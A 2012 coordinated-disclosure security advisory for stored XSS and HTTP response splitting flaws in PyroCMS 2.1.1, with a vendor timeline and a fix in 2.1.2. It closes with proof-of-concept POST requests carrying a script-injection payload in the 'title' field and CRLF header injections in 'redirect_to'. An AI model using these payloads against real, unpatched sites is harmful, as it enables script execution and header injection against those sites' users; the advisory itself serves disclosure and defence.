PyroCMS 2.1.1 CRLF Injection And Stored XSS Vulnerability

Vendor: HappyNinjas Ltd
Product web page:
Affected version: 2.1.1 (Community)

Summary: PyroCMS is a CMS built using the CodeIgniter PHP framework.
Using an MVC architecture it was built with modularity in mind. Lightweight,
themeable and dynamic.

Desc: PyroCMS suffers from a stored XSS and HTTP Response Splitting
vulnerability when parsing user input to the 'title' and 'redirect_to'
parameters via POST method thru 'index.php' script. Attackers can exploit
these weaknesses to execute arbitrary HTML and script code in a user's
browser session or insert arbitrary HTTP headers, which are included in
a response sent to the user.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           PHP 5.3.8
           MySQL 5.5.20

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
                            Zero Science Lab -

[20.05.2012] Vulnerabilities discovered.
[20.05.2012] Initial contact with the vendor.
[20.05.2012] Vendor responds asking more details.
[20.05.2012] Sent detailed information to the vendor.
[21.05.2012] Vendor confirms the issues.
[22.05.2012] Asked vendor for status update.
[27.05.2012] Vendor replies.
[03.06.2012] Vendor releases version 2.1.2 to address these issues.
[04.06.2012] Coordinated public security advisory released.

Advisory ID: ZSL-2012-5092
Advisory URL:

Vendor Advisory:




 - POST http://localhost/pyrocms/index.php/admin/blog/categories/create_ajax HTTP/1.1

   csrf_hash_name   28b57b25dd24b3adb785de7fd863b6be
   title            "><script>alert(1);</script>


 - POST http://localhost/pyrocms/index.php/users/login HTTP/1.1

   btnLogin      Login
   redirect_to   %0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
   remember      1


 - POST http://localhost/pyrocms/index.php/comments/create/pages/4 HTTP/1.1

   comment          t00t%20w00t!
   redirect_to      %0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection
   submit           Comment
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PyroCMS 2.1.1 Multiple Vulnerabilities

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